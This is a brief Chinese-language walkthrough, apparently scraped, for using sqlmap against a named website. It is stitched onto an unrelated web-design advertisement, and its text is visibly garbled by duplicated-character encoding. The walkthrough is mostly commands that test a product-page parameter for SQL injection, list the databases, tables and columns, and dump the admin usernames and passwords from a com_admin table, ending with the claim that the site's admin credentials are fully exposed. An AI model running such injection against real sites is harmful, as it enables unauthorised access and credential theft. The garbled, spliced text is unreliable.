用sqlmap進(jìn)行注入
十載的雙臺(tái)子網(wǎng)站建設(shè)經(jīng)驗(yàn),針對(duì)設(shè)計(jì)、前端、開(kāi)發(fā)、售后、文案、推廣等六對(duì)一服務(wù),響應(yīng)快,48小時(shí)及時(shí)工作處理。成都營(yíng)銷網(wǎng)站建設(shè)的優(yōu)勢(shì)是能夠根據(jù)用戶設(shè)備顯示端的尺寸不同,自動(dòng)調(diào)整雙臺(tái)子建站的顯示方式,使網(wǎng)站能夠適用不同顯示終端,在瀏覽器中調(diào)整網(wǎng)站的寬度,無(wú)論在任何一種瀏覽器上瀏覽網(wǎng)站,都能展現(xiàn)優(yōu)雅布局與設(shè)計(jì),從而大程度地提升瀏覽體驗(yàn)。成都創(chuàng)新互聯(lián)從事“雙臺(tái)子網(wǎng)站設(shè)計(jì)”,“雙臺(tái)子網(wǎng)站推廣”以來(lái),每個(gè)客戶項(xiàng)目都認(rèn)真落實(shí)執(zhí)行。
1、用掃描工具可以掃出注入點(diǎn)這里我用一個(gè)注入點(diǎn)進(jìn)行說(shuō)明。
sqlamp.py -u“http://www.gaoneng.com/product.php?cid=71”
可以看出此處存在sql注入漏洞。
2、
sqlmap.py -u“http://www.gaoneng.com/product.php?cid=71”
--dbs 可以跑出存在的數(shù)據(jù)庫(kù)名
然后可以跑gaoneng數(shù)據(jù)庫(kù)中的表
Sqlmap.py -u”http://www.gaoneng.com/product.php?cid=71” -D gaoneng --tables
既然已經(jīng)爆出數(shù)據(jù)庫(kù)里的表,那就可以爆出表中的字段
Sqlmap.py -u“http://www.gaoneng.com/product.php?cid=71”
-D gaoneng -T com_admin --columns
可以看到這個(gè)表中存在我們需要的字段,密碼與用戶名
Sqlmap.py -u“http://www.gaoneng.com/product.php?cid=71”
-D gaoneng -T com_admin -C username,password --dump
由此這個(gè)網(wǎng)站的管理員密碼與用戶名已被完全爆出。